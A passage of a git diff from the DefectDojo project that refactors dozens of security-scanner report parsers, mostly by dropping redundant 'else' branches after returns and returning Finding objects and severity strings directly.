b/dojo/tools/chefinspect/parser.py @@ -17,14 +17,13 @@ def convert_score(self, raw_value): val = float(raw_value) if val == 0.0: return "Info" - elif val < 0.4: + if val < 0.4: return "Low" - elif val < 0.7: + if val < 0.7: return "Medium" - elif val < 0.9: + if val < 0.9: return "High" - else: - return "Critical" + return "Critical" def get_findings(self, file, test): lines = file.read() diff --git a/dojo/tools/clair/clairklar_parser.py b/dojo/tools/clair/clairklar_parser.py index efef6483d58..bc168fbabab 100644 --- a/dojo/tools/clair/clairklar_parser.py +++ b/dojo/tools/clair/clairklar_parser.py @@ -79,7 +79,7 @@ def get_item_clairklar(self, item_node, test): if "Link" in item_node: link = item_node["Link"] - finding = Finding( + return Finding( title=item_node["Name"] + " - " + "(" @@ -101,4 +101,3 @@ def get_item_clairklar(self, item_node, test): dynamic_finding=False, impact="No impact provided", ) - return finding diff --git a/dojo/tools/clair/parser.py b/dojo/tools/clair/parser.py index 8b82aa8ec6b..99bf78729c0 100644 --- a/dojo/tools/clair/parser.py +++ b/dojo/tools/clair/parser.py @@ -19,10 +19,10 @@ def get_findings(self, json_output, test): if tree: if self.scanner == "clair": return ClairScan().get_items_clair(tree, test) - elif self.scanner == "clairklar": + if self.scanner == "clairklar": return ClairKlarScan().get_items_klar(tree, test) - else: - return [] + return None + return [] def parse_json(self, json_output): try: diff --git a/dojo/tools/cloudsploit/parser.py b/dojo/tools/cloudsploit/parser.py index 7ad446bcf74..ccf3181aa1d 100644 --- a/dojo/tools/cloudsploit/parser.py +++ b/dojo/tools/cloudsploit/parser.py @@ -75,5 +75,4 @@ def convert_severity(self, status): return "Medium" if status == "FAIL": return "Critical" - else: - return "Info" + return "Info" diff --git a/dojo/tools/codechecker/parser.py b/dojo/tools/codechecker/parser.py index 41998099e56..5e96c75be35 100644 --- a/dojo/tools/codechecker/parser.py +++ b/dojo/tools/codechecker/parser.py @@ -19,11 +19,12 @@ def get_requires_file(self, scan_type): def get_findings(self, json_output, test): if json_output is None: - return + return None tree = self.parse_json(json_output) if tree: return self.get_items(tree) + return None def parse_json(self, json_output): data = json_output.read() @@ -99,7 +100,7 @@ def get_item(vuln): else: title = unique_id_from_tool - finding = Finding( + return Finding( title=title, description=description, severity=severity, @@ -119,8 +120,6 @@ def get_item(vuln): ], ) - return finding - def get_mapped_severity(severity): switcher = { diff --git a/dojo/tools/contrast/parser.py b/dojo/tools/contrast/parser.py index fb31316e5f1..97e8fbf641e 100644 --- a/dojo/tools/contrast/parser.py +++ b/dojo/tools/contrast/parser.py @@ -124,8 +124,7 @@ def format_description(self, row): + row.get("Vulnerability Name") + "\n" ) - description = description + "**Status:** " + row.get("Status") + "\n" - return description + return description + "**Status:** " + row.get("Status") + "\n" def format_cwe(self, url): # Get the last path diff --git a/dojo/tools/crashtest_security/parser.py b/dojo/tools/crashtest_security/parser.py index 2c118d84665..71278115ecb 100644 --- a/dojo/tools/crashtest_security/parser.py +++ b/dojo/tools/crashtest_security/parser.py @@ -131,14 +131,13 @@ def get_severity(self, cvss_base_score): """ if cvss_base_score == 0: return "Info" - elif cvss_base_score < 4: + if cvss_base_score < 4: return "Low" - elif cvss_base_score < 7: + if cvss_base_score < 7: return "Medium" - elif cvss_base_score < 9: + if cvss_base_score < 9: return "High" - else: - return "Critical" + return "Critical" class CrashtestSecurityXmlParser: @@ -153,8 +152,7 @@ def get_findings(self, xml_output, test): if tree: return self.get_items(tree, test) - else: - return [] + return [] def parse_xml(self, xml_output): """ @@ -244,8 +242,7 @@ def get_findings(self, filename, test): if filename.name.lower().endswith(".xml"): return CrashtestSecurityXmlParser().get_findings(filename, test) - elif filename.name.lower().endswith(".json"): + if filename.name.lower().endswith(".json"): return CrashtestSecurityJsonParser().get_findings(filename, test) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/crunch42/parser.py b/dojo/tools/crunch42/parser.py index 02868e45b55..d4d19ff35e4 100644 --- a/dojo/tools/crunch42/parser.py +++ b/dojo/tools/crunch42/parser.py @@ -38,8 +38,7 @@ def get_findings(self, filename, test): for moduleTree in reportTree: temp += self.process_tree(moduleTree, test) return temp - else: - return self.process_tree(reportTree, test) + return self.process_tree(reportTree, test) def get_items(self, tree, test): items = {} @@ -72,7 +71,7 @@ def get_item(self, issue, title, test): else: severity = "Critical" # create the finding object - finding = Finding( + return Finding( unique_id_from_tool=fingerprint, title=title, test=test, @@ -87,4 +86,3 @@ def get_item(self, issue, title, test): static_finding=True, dynamic_finding=False, ) - return finding diff --git a/dojo/tools/cyclonedx/json_parser.py b/dojo/tools/cyclonedx/json_parser.py index 265b5e02872..6a329cfdfa7 100644 --- a/dojo/tools/cyclonedx/json_parser.py +++ b/dojo/tools/cyclonedx/json_parser.py @@ -144,4 +144,4 @@ def _flatten_components(self, components, flatted_components): # tools don't provide it if "bom-ref" in component: flatted_components[component["bom-ref"]] = component - return None + return diff --git a/dojo/tools/cyclonedx/parser.py b/dojo/tools/cyclonedx/parser.py index 8fe80a51136..d01798e3583 100644 --- a/dojo/tools/cyclonedx/parser.py +++ b/dojo/tools/cyclonedx/parser.py @@ -20,5 +20,4 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, file, test): if file.name.strip().lower().endswith(".json"): return CycloneDXJSONParser()._get_findings_json(file, test) - else: - return CycloneDXXMLParser()._get_findings_xml(file, test) + return CycloneDXXMLParser()._get_findings_xml(file, test) diff --git a/dojo/tools/deepfence_threatmapper/compliance.py b/dojo/tools/deepfence_threatmapper/compliance.py index 5cd4f5b6340..f948a18c929 100644 --- a/dojo/tools/deepfence_threatmapper/compliance.py +++ b/dojo/tools/deepfence_threatmapper/compliance.py @@ -32,7 +32,7 @@ def get_findings(self, row, headers, test): description += "**test_number:** " + str(test_number) + "\n" description += "**count:** " + str(count) + "\n" description += "**doc_id:** " + str(doc_id) + "\n" - finding = Finding( + return Finding( title="Threatmapper_Compliance_Report-" + test_number, description=description, severity=self.compliance_severity(status), @@ -40,7 +40,6 @@ def get_findings(self, row, headers, test): dynamic_finding=True, test=test, ) - return finding def compliance_severity(self, input): if input == "pass": diff --git a/dojo/tools/deepfence_threatmapper/malware.py b/dojo/tools/deepfence_threatmapper/malware.py index f1931e42623..f764a2ce4b0 100644 --- a/dojo/tools/deepfence_threatmapper/malware.py +++ b/dojo/tools/deepfence_threatmapper/malware.py @@ -21,7 +21,7 @@ def get_findings(self, row, headers, test): description += "**NodeType:** " + str(NodeType) + "\n" description += "**Container Name:** " + str(Container_Name) + "\n" description += "**Kubernetes Cluster Name:** " + str(Kubernetes_Cluster_Name) + "\n" - finding = Finding( + return Finding( title=Rule_Name, description=description, file_path=File_Name, @@ -30,10 +30,8 @@ def get_findings(self, row, headers, test): dynamic_finding=True, test=test, ) - return finding def severity(self, input): if input is None: return "Info" - else: - return input.capitalize() + return input.capitalize() diff --git a/dojo/tools/deepfence_threatmapper/secret.py b/dojo/tools/deepfence_threatmapper/secret.py index fd102be834a..2eae14bc76b 100644 --- a/dojo/tools/deepfence_threatmapper/secret.py +++ b/dojo/tools/deepfence_threatmapper/secret.py @@ -38,5 +38,4 @@ def get_findings(self, row, headers, test): def severity(self, input): if input is None: return "Info" - else: - return input.capitalize() + return input.capitalize() diff --git a/dojo/tools/deepfence_threatmapper/vulnerability.py b/dojo/tools/deepfence_threatmapper/vulnerability.py index 61c1e505cdc..b76505613af 100644 --- a/dojo/tools/deepfence_threatmapper/vulnerability.py +++ b/dojo/tools/deepfence_threatmapper/vulnerability.py @@ -29,7 +29,7 @@ def get_findings(self, row, headers, test): description += "**host_name:** " + str(host_name) + "\n" description += "**cloud_account_id:** " + str(cloud_account_id) + "\n" description += "**masked:** " + str(masked) + "\n" - finding = Finding( + return Finding( title="Threatmapper_Vuln_Report-" + cve_id, description=description, component_name=cve_caused_by_package, @@ -41,10 +41,8 @@ def get_findings(self, row, headers, test): cve=cve_id, test=test, ) - return finding def severity(self, input): if input is None: return "Info" - else: - return input.capitalize() + return input.capitalize() diff --git a/dojo/tools/dependency_check/parser.py b/dojo/tools/dependency_check/parser.py index 96940049984..1d4a167429d 100644 --- a/dojo/tools/dependency_check/parser.py +++ b/dojo/tools/dependency_check/parser.py @@ -46,12 +46,11 @@ def get_filename_and_path_from_dependency( return related_dependency.findtext( f"{namespace}fileName", ), related_dependency.findtext(f"{namespace}filePath") - else: - # without filename, it would be just a duplicate finding so we have to skip it. filename - # is only present for relateddependencies since v6.0.0 - # logger.debug('related_dependency: %s', - # ElementTree.tostring(related_dependency, encoding='utf8', method='xml')) - return None, None + # without filename, it would be just a duplicate finding so we have to skip it. filename + # is only present for relateddependencies since v6.0.0 + # logger.debug('related_dependency: %s', + # ElementTree.tostring(related_dependency, encoding='utf8', method='xml')) + return None, None def get_component_name_and_version_from_dependency( self, dependency, related_dependency, namespace, diff --git a/dojo/tools/dependency_track/parser.py b/dojo/tools/dependency_track/parser.py index 2e3467623f9..eecc09670a3 100644 --- a/dojo/tools/dependency_track/parser.py +++ b/dojo/tools/dependency_track/parser.py @@ -92,16 +92,15 @@ def _convert_dependency_track_severity_to_dojo_severity(self, dependency_track_s severity = dependency_track_severity.lower() if severity == "critical": return "Critical" - elif severity == "high": + if severity == "high": return "High" - elif severity == "medium": + if severity == "medium": return "Medium" - elif severity == "low": + if severity == "low": return "Low" - elif severity.startswith("info"): + if severity.startswith("info"): return "Informational" - else: - return None + return None def _convert_dependency_track_finding_to_dojo_finding(self, dependency_track_finding, test): """ diff --git a/dojo/tools/dockerbench/parser.py b/dojo/tools/dockerbench/parser.py index 120da8eb6fc..c8aa321f7b2 100644 --- a/dojo/tools/dockerbench/parser.py +++ b/dojo/tools/dockerbench/parser.py @@ -111,7 +111,7 @@ def get_item(vuln, test, test_start, test_end, description): vuln["remediation-impact"], ) - finding = Finding( + return Finding( title=title, date=datetime.fromtimestamp(int(test_end)), test=test, @@ -122,5 +122,3 @@ def get_item(vuln, test, test_start, test_end, description): static_finding=True, dynamic_finding=False, ) - - return finding diff --git a/dojo/tools/drheader/parser.py b/dojo/tools/drheader/parser.py index 158da541bd3..bf8435f63ab 100644 --- a/dojo/tools/drheader/parser.py +++ b/dojo/tools/drheader/parser.py @@ -50,7 +50,6 @@ def get_findings(self, filename, test): for finding in item["report"]: items.append(self.return_finding(test=test, finding=finding, url=url)) return items - else: - for finding in data: - items.append(self.return_finding(test=test, finding=finding)) - return items + for finding in data: + items.append(self.return_finding(test=test, finding=finding)) + return items diff --git a/dojo/tools/eslint/parser.py b/dojo/tools/eslint/parser.py index 9e282cca41d..329e2fac751 100644 --- a/dojo/tools/eslint/parser.py +++ b/dojo/tools/eslint/parser.py @@ -16,10 +16,9 @@ def get_description_for_scan_types(self, scan_type): def _convert_eslint_severity_to_dojo_severity(self, eslint_severity): if eslint_severity == 2: return "High" - elif eslint_severity == 1: + if eslint_severity == 1: return "Medium" - else: - return "Info" + return "Info" def get_findings(self, filename, test): tree = filename.read() diff --git a/dojo/tools/fortify/parser.py b/dojo/tools/fortify/parser.py index b6f7e5185c8..7d2b15c0e25 100644 --- a/dojo/tools/fortify/parser.py +++ b/dojo/tools/fortify/parser.py @@ -15,8 +15,7 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, filename, test): if str(filename.name).endswith(".xml"): return FortifyXMLParser().parse_xml(filename, test) - elif str(filename.name).endswith(".fpr"): + if str(filename.name).endswith(".fpr"): return FortifyFPRParser().parse_fpr(filename, test) - else: - msg = "Filename extension not recognized. Use .xml or .fpr" - raise ValueError(msg) + msg = "Filename extension not recognized. Use .xml or .fpr" + raise ValueError(msg) diff --git a/dojo/tools/generic/csv_parser.py b/dojo/tools/generic/csv_parser.py index 001ea2ad91f..4e8acb461d9 100644 --- a/dojo/tools/generic/csv_parser.py +++ b/dojo/tools/generic/csv_parser.py @@ -105,5 +105,4 @@ def _convert_bool(self, val): def get_severity(self, input): if input in ["Info", "Low", "Medium", "High", "Critical"]: return input - else: - return "Info" + return "Info" diff --git a/dojo/tools/generic/parser.py b/dojo/tools/generic/parser.py index e2fb66086bb..cf03d9753bc 100644 --- a/dojo/tools/generic/parser.py +++ b/dojo/tools/generic/parser.py @@ -20,12 +20,12 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, filename, test): if filename.name.lower().endswith(".csv"): return GenericCSVParser()._get_findings_csv(filename) - elif filename.name.lower().endswith(".json"): + if filename.name.lower().endswith(".json"): data = json.load(filename) test_internal = GenericJSONParser()._get_test_json(data) return test_internal.findings - else: # default to CSV like before - return GenericCSVParser()._get_findings_csv(filename) + # default to CSV like before + return GenericCSVParser()._get_findings_csv(filename) def get_tests(self, scan_type, filename): # if the file is a CSV just use the old function diff --git a/dojo/tools/github_vulnerability/parser.py b/dojo/tools/github_vulnerability/parser.py index b03dbc01e5d..c0ad99ac9a4 100644 --- a/dojo/tools/github_vulnerability/parser.py +++ b/dojo/tools/github_vulnerability/parser.py @@ -131,7 +131,7 @@ def get_findings(self, filename, test): else: dupes[dupe_key] = finding return list(dupes.values()) - elif isinstance(data, list): + if isinstance(data, list): findings = [] for vuln in data: url = vuln["url"] @@ -185,6 +185,7 @@ def get_findings(self, filename, test): ) findings.append(finding) return findings + return None def _search_vulnerability_alerts(self, data): if isinstance(data, list): @@ -204,5 +205,4 @@ def _search_vulnerability_alerts(self, data): def _convert_security(self, val): if val.lower() == "moderate": return "Medium" - else: - return val.title() + return val.title() diff --git a/dojo/tools/gitlab_dep_scan/parser.py b/dojo/tools/gitlab_dep_scan/parser.py index 2ec561500cd..cc365c8acba 100644 --- a/dojo/tools/gitlab_dep_scan/parser.py +++ b/dojo/tools/gitlab_dep_scan/parser.py @@ -15,11 +15,12 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, json_output, test): if json_output is None: - return + return None tree = self.parse_json(json_output) if tree: return self.get_items(tree, test) + return None def parse_json(self, json_output): try: diff --git a/dojo/tools/gitlab_sast/parser.py b/dojo/tools/gitlab_sast/parser.py index f4d169b2059..ebe5071ce6e 100644 --- a/dojo/tools/gitlab_sast/parser.py +++ b/dojo/tools/gitlab_sast/parser.py @@ -18,11 +18,12 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, json_output, test): if json_output is None: - return + return None tree = self.parse_json(json_output) if tree: return self.get_items(tree) + return None def get_tests(self, scan_type, handle): tree = self.parse_json(handle) diff --git a/dojo/tools/harbor_vulnerability/parser.py b/dojo/tools/harbor_vulnerability/parser.py index c70c7031a5c..b1f2ab23633 100644 --- a/dojo/tools/harbor_vulnerability/parser.py +++ b/dojo/tools/harbor_vulnerability/parser.py @@ -105,5 +105,4 @@ def get_findings(self, filename, test): def transpose_severity(severity): if severity in Finding.SEVERITIES: return severity - else: - return "Info" + return "Info" diff --git a/dojo/tools/hcl_appscan/parser.py b/dojo/tools/hcl_appscan/parser.py index 00124b3f6c4..eaff922e2e8 100644 --- a/dojo/tools/hcl_appscan/parser.py +++ b/dojo/tools/hcl_appscan/parser.py @@ -119,5 +119,4 @@ def get_findings(self, file, test): except UnboundLocalError: pass return findings - else: - return findings + return findings diff --git a/dojo/tools/huskyci/parser.py b/dojo/tools/huskyci/parser.py index 028f4e18453..faa6120b141 100644 --- a/dojo/tools/huskyci/parser.py +++ b/dojo/tools/huskyci/parser.py @@ -20,11 +20,12 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, json_output, test): if json_output is None: - return + return None tree = self.parse_json(json_output) if tree: return self.get_items(tree, test) + return None def parse_json(self, json_output): try: @@ -71,7 +72,7 @@ def get_item(item_node, test): if "securitytool" in item_node: description += "\nSecurity Tool: " + item_node.get("securitytool") - finding = Finding( + return Finding( title=item_node.get("title"), test=test, severity=item_node.get("severity"), @@ -88,5 +89,3 @@ def get_item(item_node, test): dynamic_finding=False, impact="No impact provided", ) - - return finding diff --git a/dojo/tools/hydra/parser.py b/dojo/tools/hydra/parser.py index c42e8637f2e..bbdffa0abe1 100644 --- a/dojo/tools/hydra/parser.py +++ b/dojo/tools/hydra/parser.py @@ -39,9 +39,7 @@ def get_findings(self, json_output, test): report = self.__parse_json(json_output) metadata = HydraScanMetadata(report["generator"]) - findings = self.__extract_findings(report["results"], metadata, test) - - return findings + return self.__extract_findings(report["results"], metadata, test) def __extract_findings( self, raw_findings, metadata: HydraScanMetadata, test, diff --git a/dojo/tools/intsights/parser.py b/dojo/tools/intsights/parser.py index e49c61b852f..74eda25dc80 100644 --- a/dojo/tools/intsights/parser.py +++ b/dojo/tools/intsights/parser.py @@ -29,7 +29,7 @@ def _build_finding_description(self, alert: dict) -> str: Returns: A markdown formatted description """ - description = "\n".join( + return "\n".join( [ alert["description"], f'**Date Found**: `{alert.get("report_date", "None provided")} `', @@ -41,7 +41,6 @@ def _build_finding_description(self, alert: dict) -> str: f'**Alert Link**: {alert.get("alert_link", "None provided")}', ], ) - return description def get_findings(self, file, test): duplicates = {} diff --git a/dojo/tools/jfrog_xray_on_demand_binary_scan/parser.py b/dojo/tools/jfrog_xray_on_demand_binary_scan/parser.py index 053df04aa0e..456b23a7330 100644 --- a/dojo/tools/jfrog_xray_on_demand_binary_scan/parser.py +++ b/dojo/tools/jfrog_xray_on_demand_binary_scan/parser.py @@ -66,8 +66,7 @@ def get_references(vulnerability): else: ref += "- " + reference + "\n" return ref - else: - return None + return None def get_remediation(extended_information): @@ -125,8 +124,7 @@ def process_component(component): def get_cve(vulnerability): if "cves" in vulnerability: - cves = vulnerability["cves"] - return cves + return vulnerability["cves"] return [] diff --git a/dojo/tools/kubebench/parser.py b/dojo/tools/kubebench/parser.py index f288da95426..a2263dce841 100644 --- a/dojo/tools/kubebench/parser.py +++ b/dojo/tools/kubebench/parser.py @@ -17,8 +17,7 @@ def get_findings(self, json_output, test): tree = json.load(json_output) if "Controls" in tree: return self.get_chapters(tree["Controls"], test) - else: - return self.get_chapters(tree, test) + return self.get_chapters(tree, test) def get_chapters(self, tree, test): items = [] @@ -105,7 +104,7 @@ def get_item(vuln, test, description): mitigation = vuln.get("remediation", None) vuln_id_from_tool = test_number - finding = Finding( + return Finding( title=title, test=test, description=description, @@ -115,5 +114,3 @@ def get_item(vuln, test, description): static_finding=True, dynamic_finding=False, ) - - return finding diff --git a/dojo/tools/kubescape/parser.py b/dojo/tools/kubescape/parser.py index 877a903db1a..c371f477901 100644 --- a/dojo/tools/kubescape/parser.py +++ b/dojo/tools/kubescape/parser.py @@ -29,12 +29,13 @@ def __hyperlink(link: str) -> str: def severity_mapper(self, input): if input <= 4: return "Low" - elif input <= 7: + if input <= 7: return "Medium" - elif input <= 9: + if input <= 9: return "High" - elif input <= 10: + if input <= 10: return "Critical" + return None def parse_resource_id(self, resource_id): try: diff --git a/dojo/tools/microfocus_webinspect/parser.py b/dojo/tools/microfocus_webinspect/parser.py index 58713a66410..d5a2611f95c 100644 --- a/dojo/tools/microfocus_webinspect/parser.py +++ b/dojo/tools/microfocus_webinspect/parser.py @@ -97,16 +97,15 @@ def get_findings(self, file, test): def convert_severity(val): if val == "0": return "Info" - elif val == "1": + if val == "1": return "Low" - elif val == "2": + if val == "2": return "Medium" - elif val == "3": + if val == "3": return "High" - elif val == "4": + if val == "4": return "Critical" - else: - return "Info" + return "Info" @staticmethod def get_cwe(val): @@ -114,5 +113,4 @@ def get_cwe(val): cweSearch = re.search("CWE-(\\d+)", val, re.IGNORECASE) if cweSearch: return int(cweSearch.group(1)) - else: - return 0 + return 0 diff --git a/dojo/tools/mobsf/parser.py b/dojo/tools/mobsf/parser.py index 9e8ccf91029..b86d7bf041b 100644 --- a/dojo/tools/mobsf/parser.py +++ b/dojo/tools/mobsf/parser.py @@ -378,8 +378,7 @@ def getSeverityForPermission(self, status): """ if "dangerous" == status: return "High" - else: - return "Info" + return "Info" # Criticality rating def getCriticalityRating(self, rating): diff --git a/dojo/tools/mobsfscan/parser.py b/dojo/tools/mobsfscan/parser.py index ae7eecc1224..bd9fd5167a3 100644 --- a/dojo/tools/mobsfscan/parser.py +++ b/dojo/tools/mobsfscan/parser.py @@ -29,53 +29,52 @@ def get_findings(self, filename, test): data = json.load(filename) if len(data.get("results")) == 0: return [] - else: - dupes = {} - for key, item in data.get("results").items(): - metadata = item.get("metadata") - cwe = int( - re.match(r"(cwe|CWE)-([0-9]+)", metadata.get("cwe")).group( - 2, - ), - ) - masvs = metadata.get("masvs") - owasp_mobile = metadata.get("owasp-mobile") - description = "\n".join( - [ - f"**Description:** `{metadata.get('description')}`", - f"**OWASP MASVS:** `{masvs}`", - f"**OWASP Mobile:** `{owasp_mobile}`", - ], - ) - references = metadata.get("reference") - if metadata.get("severity") in self.SEVERITY: - severity = self.SEVERITY[metadata.get("severity")] - else: - severity = "Info" + dupes = {} + for key, item in data.get("results").items(): + metadata = item.get("metadata") + cwe = int( + re.match(r"(cwe|CWE)-([0-9]+)", metadata.get("cwe")).group( + 2, + ), + ) + masvs = metadata.get("masvs") + owasp_mobile = metadata.get("owasp-mobile") + description = "\n".join( + [ + f"**Description:** `{metadata.get('description')}`", + f"**OWASP MASVS:** `{masvs}`", + f"**OWASP Mobile:** `{owasp_mobile}`", + ], + ) + references = metadata.get("reference") + if metadata.get("severity") in self.SEVERITY: + severity = self.SEVERITY[metadata.get("severity")] + else: + severity = "Info" - finding = Finding( - title=f"{key}", - test=test, - severity=severity, - nb_occurences=1, - cwe=cwe, - description=description, - references=references, - ) - if item.get("files"): - for file in item.get("files"): - file_path = file.get("file_path") - line = file.get("match_lines")[0] - finding.file_path = file_path - finding.line = line + finding = Finding( + title=f"{key}", + test=test, + severity=severity, + nb_occurences=1, + cwe=cwe, + description=description, + references=references, + ) + if item.get("files"): + for file in item.get("files"): + file_path = file.get("file_path") + line = file.get("match_lines")[0] + finding.file_path = file_path + finding.line = line - dupe_key = hashlib.sha256( - (key + str(cwe) + masvs + owasp_mobile).encode("utf-8"), - ).hexdigest() + dupe_key = hashlib.sha256( + (key + str(cwe) + masvs + owasp_mobile).encode("utf-8"), + ).hexdigest() - if dupe_key in dupes: - finding = dupes[dupe_key] - finding.nb_occurences += 1 - else: - dupes[dupe_key] = finding - return list(dupes.values()) + if dupe_key in dupes: + finding = dupes[dupe_key] + finding.nb_occurences += 1 + else: + dupes[dupe_key] = finding + return list(dupes.values()) diff --git a/dojo/tools/mozilla_observatory/parser.py b/dojo/tools/mozilla_observatory/parser.py index 783e0ada6f2..19e4c7febd7 100644 --- a/dojo/tools/mozilla_observatory/parser.py +++ b/dojo/tools/mozilla_observatory/parser.py @@ -61,9 +61,8 @@ def get_findings(self, file, test): def get_severity(self, num_severity): if 0 > num_severity >= -10: return "Low" - elif -11 >= num_severity > -26: + if -11 >= num_severity > -26: return "Medium" - elif num_severity <= -26: + if num_severity <= -26: return "High" - else: - return "Info" + return "Info" diff --git a/dojo/tools/ms_defender/parser.py b/dojo/tools/ms_defender/parser.py index 07cf6de4049..ccf348cb468 100644 --- a/dojo/tools/ms_defender/parser.py +++ b/dojo/tools/ms_defender/parser.py @@ -34,29 +34,28 @@ def get_findings(self, file, test): zipdata = {name: input_zip.read(name) for name in input_zip.namelist()} if zipdata.get("machines/") is None or zipdata.get("vulnerabilities/") is None: return [] - else: - vulnerabilityfiles = [] - machinefiles = [] - for content in list(zipdata): - if "vulnerabilities/" in content and "vulnerabilities/" != content: - vulnerabilityfiles.append(content) - if "machines/" in content and "machines/" != content: - machinefiles.append(content) - vulnerabilities = [] - machines = {} - for vulnerabilityfile in vulnerabilityfiles: - output = json.loads(zipdata[vulnerabilityfile].decode("ascii"))["value"] - for data in output: - vulnerabilities.append(data) - for machinefile in machinefiles: - output = json.loads(zipdata[machinefile].decode("ascii"))["value"] - for data in output: - machines[data.get("id")] = data - for vulnerability in vulnerabilities: - try: - self.process_zip(vulnerability, machines[vulnerability["machineId"]]) - except (IndexError, KeyError): - self.process_json(vulnerability) + vulnerabilityfiles = [] + machinefiles = [] + for content in list(zipdata): + if "vulnerabilities/" in content and "vulnerabilities/" != content: + vulnerabilityfiles.append(content) + if "machines/" in content and "machines/" != content: + machinefiles.append(content) + vulnerabilities = [] + machines = {} + for vulnerabilityfile in vulnerabilityfiles: + output = json.loads(zipdata[vulnerabilityfile].decode("ascii"))["value"] + for data in output: + vulnerabilities.append(data) + for machinefile in machinefiles: + output = json.loads(zipdata[machinefile].decode("ascii"))["value"] + for data in output: + machines[data.get("id")] = data + for vulnerability in vulnerabilities: + try: + self.process_zip(vulnerability, machines[vulnerability["machineId"]]) + except (IndexError, KeyError): + self.process_json(vulnerability) else: return [] return self.findings @@ -141,5 +140,4 @@ def process_zip(self, vulnerability, machine): def severity_check(self, input): if input in ["Informational", "Low", "Medium", "High", "Critical"]: return input - else: - return "Informational" + return "Informational" diff --git a/dojo/tools/neuvector/parser.py b/dojo/tools/neuvector/parser.py index 7cf278ce7e3..468f4104a03 100644 --- a/dojo/tools/neuvector/parser.py +++ b/dojo/tools/neuvector/parser.py @@ -116,16 +116,15 @@ def get_item(vulnerability, test): def convert_severity(severity): if severity.lower() == "critical": return "Critical" - elif severity.lower() == "high": + if severity.lower() == "high": return "High" - elif severity.lower() == "medium": + if severity.lower() == "medium": return "Medium" - elif severity.lower() == "low": + if severity.lower() == "low": return "Low" - elif severity == "": + if severity == "": return "Info" - else: - return severity.title() + return severity.title() class NeuVectorParser: @@ -144,6 +143,5 @@ def get_findings(self, filename, test): if filename.name.lower().endswith(".json"): return NeuVectorJsonParser().parse(filename, test) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/neuvector_compliance/parser.py b/dojo/tools/neuvector_compliance/parser.py index adf05d0729d..b3bd18bf6cf 100644 --- a/dojo/tools/neuvector_compliance/parser.py +++ b/dojo/tools/neuvector_compliance/parser.py @@ -101,7 +101,7 @@ def get_item(node, test): for m in messages: full_description += f"{str(m).rstrip()}\n" - finding = Finding( + return Finding( title=title, test=test, description=full_description, @@ -112,25 +112,22 @@ def get_item(node, test): dynamic_finding=False, ) - return finding - # see neuvector/share/clus_apis.go def convert_severity(severity): if severity.lower() == "high": return "High" - elif severity.lower() == "warn": + if severity.lower() == "warn": return "Medium" - elif severity.lower() == "info": + if severity.lower() == "info": return "Low" - elif severity.lower() == "pass": + if severity.lower() == "pass": return "Info" - elif severity.lower() == "note": + if severity.lower() == "note": return "Info" - elif severity.lower() == "error": + if severity.lower() == "error": return "Info" - else: - return severity.title() + return severity.title() class NeuVectorComplianceParser: @@ -149,6 +146,5 @@ def get_findings(self, filename, test): if filename.name.lower().endswith(".json"): return parse(filename, test) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/nikto/parser.py b/dojo/tools/nikto/parser.py index 57908f3d5db..c3d332d29c3 100644 --- a/dojo/tools/nikto/parser.py +++ b/dojo/tools/nikto/parser.py @@ -27,8 +27,7 @@ def get_description_for_scan_types(self, scan_type): def get_findings(self, filename, test): if filename.name.lower().endswith(".xml"): return NiktoXMLParser().process_xml(filename, test) - elif filename.name.lower().endswith(".json"): + if filename.name.lower().endswith(".json"): return NiktoJSONParser().process_json(filename, test) - else: - msg = "Unknown File Format" - raise ValueError(msg) + msg = "Unknown File Format" + raise ValueError(msg) diff --git a/dojo/tools/nmap/parser.py b/dojo/tools/nmap/parser.py index 5e101f2bb9f..f1a62892c69 100644 --- a/dojo/tools/nmap/parser.py +++ b/dojo/tools/nmap/parser.py @@ -146,14 +146,13 @@ def convert_cvss_score(self, raw_value): val = float(raw_value) if val == 0.0: return "Info" - elif val < 4.0: + if val < 4.0: return "Low" - elif val < 7.0: + if val < 7.0: return "Medium" - elif val < 9.0: + if val < 9.0: return "High" - else: - return "Critical" + return "Critical" def manage_vulner_script( self, test, dupes, script_element, endpoint, report_date=None, diff --git a/dojo/tools/noseyparker/parser.py b/dojo/tools/noseyparker/parser.py index 8c4a80190d5..aa35489a657 100644 --- a/dojo/tools/noseyparker/parser.py +++ b/dojo/tools/noseyparker/parser.py @@ -29,8 +29,8 @@ def get_findings(self, file, test): # Turn JSONL file into DataFrame if file is None: - return - elif file.name.lower().endswith(".jsonl"): + return None + if file.name.lower().endswith(".jsonl"): # Process JSON lines into Dict data = [json.loads(line) for line in file] diff --git a/dojo/tools/npm_audit/parser.py b/dojo/tools/npm_audit/parser.py index fc07e281007..f5143f72af3 100644 --- a/dojo/tools/npm_audit/parser.py +++ b/dojo/tools/npm_audit/parser.py @@ -24,7 +24,7 @@ def get_findings(self, json_output, test): def parse_json(self, json_output): if json_output is None: - return + return None try: data = json_output.read() try: @@ -46,9 +46,7 @@ def parse_json(self, json_output): msg = "npm audit report contains errors: %s, %s" raise ValueError(msg, code, summary) - subtree = tree.get("advisories") - - return subtree + return tree.get("advisories") def get_items(self, tree, test): items = {} diff --git a/dojo/tools/npm_audit_7_plus/parser.py b/dojo/tools/npm_audit_7_plus/parser.py index 65b78b4052c..88198844a04 100644 --- a/dojo/tools/npm_audit_7_plus/parser.py +++ b/dojo/tools/npm_audit_7_plus/parser.py @@ -44,7 +44,7 @@ def get_findings(self, json_output, test): def parse_json(self, json_output): """Parse the json format to get findings.""" if json_output is None: - return + return None try: data = json_output.read() try: diff --git a/dojo/tools/nsp/parser.py b/dojo/tools/nsp/parser.py index 0b4da91c4e4..466ed6dfa60 100644 --- a/dojo/tools/nsp/parser.py +++ b/dojo/tools/nsp/parser.py @@ -17,8 +17,7 @@ def get_findings(self, json_output, test): tree = self.parse_json(json_output) if tree: return self.get_items(tree, test) - else: - return [] + return [] def parse_json(self, json_output): try: @@ -56,7 +55,7 @@ def get_item(item_node, test): else: severity = "Critical" - finding = Finding( + return Finding( title=item_node["title"] + " - " + "(" @@ -89,5 